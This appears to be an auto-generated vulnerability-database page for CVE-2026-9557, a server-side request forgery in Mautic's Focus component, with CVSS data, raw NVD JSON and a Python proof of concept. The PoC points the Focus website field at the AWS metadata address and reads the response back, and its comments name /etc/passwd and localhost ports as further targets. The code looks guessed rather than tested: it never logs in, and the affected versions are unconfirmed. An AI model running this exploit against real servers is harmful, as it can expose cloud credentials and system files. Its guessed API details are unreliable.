Security Vulnerability Report
中文
CVE-2026-9557 CVSS 6.4 MEDIUM

CVE-2026-9557

Published: 2026-05-29 11:16:18
Last Modified: 2026-05-29 15:39:35

Description

A Server-Side Request Forgery (SSRF) vulnerability exists in Mautic's Focus component. Due to insufficient validation of user-supplied URLs, an authenticated user can trigger outbound HTTP requests from the hosting server, enabling internal network reconnaissance or forcing requests to arbitrary internal or external destinations.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Mautic Focus组件 < 受影响版本(具体版本待官方确认)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2026-9557 PoC - Mautic Focus Component SSRF # Target: Mautic instance with Focus component # Authentication: Low-privilege user account required TARGET_URL = "http://target-mautic-instance.com" USERNAME = "[email protected]" PASSWORD = "password123" def exploit_ssrf(target, session): """ Exploit SSRF in Mautic Focus component to trigger server-side HTTP requests """ # Step 1: Create malicious Focus with SSRF payload focus_data = { "focus[name]": "Malicious Focus", "focus[website]": "http://169.254.169.254/latest/meta-data/", # AWS metadata "focus[type]": "website" } # Step 2: Trigger request by accessing Focus preview or stats response = session.post( f"{target}/api/focuses/new", json=focus_data ) # Step 3: Retrieve SSRF response data focus_id = response.json().get('focus', {}).get('id') stats_response = session.get(f"{target}/api/focuses/{focus_id}/stats") return stats_response.text # Note: This PoC demonstrates the SSRF vulnerability concept. # Actual exploitation requires proper authentication and API access. # Target internal services by modifying the 'focus[website]' parameter. # Example targets: file:///etc/passwd, http://localhost:port, 169.254.169.254

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9557", "sourceIdentifier": "[email protected]", "published": "2026-05-29T11:16:17.853", "lastModified": "2026-05-29T15:39:34.620", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Server-Side Request Forgery (SSRF) vulnerability exists in Mautic's Focus component. Due to insufficient validation of user-supplied URLs, an authenticated user can trigger outbound HTTP requests from the hosting server, enabling internal network reconnaissance or forcing requests to arbitrary internal or external destinations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/mautic/mautic/security/advisories/GHSA-jmv8-8j9j-rcpc", "source": "[email protected]"}]}}